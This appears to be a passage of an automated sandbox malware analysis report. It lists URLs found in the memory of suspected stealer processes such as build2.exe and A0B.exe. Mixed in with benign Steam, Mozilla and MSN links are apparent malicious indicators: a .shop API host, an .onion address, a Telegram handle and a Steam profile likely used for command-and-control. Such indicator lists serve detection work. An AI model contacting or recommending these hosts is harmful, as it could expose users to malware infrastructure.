Source: A0B.exe, 00000017.00000003.3047552796.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3050934664.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3055723074.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3046020871.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3046520097.000000000150B000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3053757270.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3052487472.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3048685406.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3049074916.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3049820825.000000000150C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://resergvearyinitiani.shop/apia
Source: A0B.exe, 00000017.00000003.3003702566.00000000014AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://resergvearyinitiani.shop/apib
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C40E000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3193553866.000000000C47C000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3193553866.000000000C46C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://statsexplorer.org
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C40E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://statsexplorer.orgServersCaptionMicrosoft
Source: 71C9.exe, 0000001D.00000002.3222435019.000000000C538000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C46E000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3193553866.000000000C46C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionSELECT
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C47C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionWbemSc
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C40E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://statsexplorer.orghttps://statsexplorer.org
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: build2.exe, 00000029.00000002.3569722785.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/#
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199658817715
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: build2.exe, 00000023.00000002.3157289895.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000939000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715$d6
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715/badges
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715/inventory/
Source: build2.exe, 00000023.00000002.3157289895.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715https://t.me/sa9okRed
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: build2.exe, 00000029.00000003.3481136987.000000001EF10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: A0B.exe, 00000017.00000003.3036752678.0000000003BBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: build2.exe, 00000029.00000003.3481136987.000000001EF10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: build2.exe, 00000023.00000002.3157289895.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/sa9ok
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
Source: DB15.exe, 00000011.00000002.4519701063.0000000000641000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4517742104.00000000005E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.2110427730.00000000099AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000022.00000003.3237926713.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3199766395.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193350386.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3204949143.000000000950D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000002.00000000.2112529074.000000000C048000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comM
Source: build2.exe, 00000029.00000003.3356770274.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: A0B.exe, 00000017.00000003.3037411971.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: A0B.exe, 00000017.00000003.3037411971.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/P.exe
Source: build2.exe, 00000029.00000003.3481136987.000000001EF10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000600000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: build2.exe, 00000029.00000002.3568020251.0000000000600000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/HIDHIDAEHC
Source: build2.exe, 00000029.00000003.3481136987.000000001EF10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: build2.exe, 00000029.00000003.3481136987.000000001EF10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000022.00000002.4531306676.0000000007BCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/20-gop-senators-led-by-rick-scott-vow-to-block-bills-not-rel
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
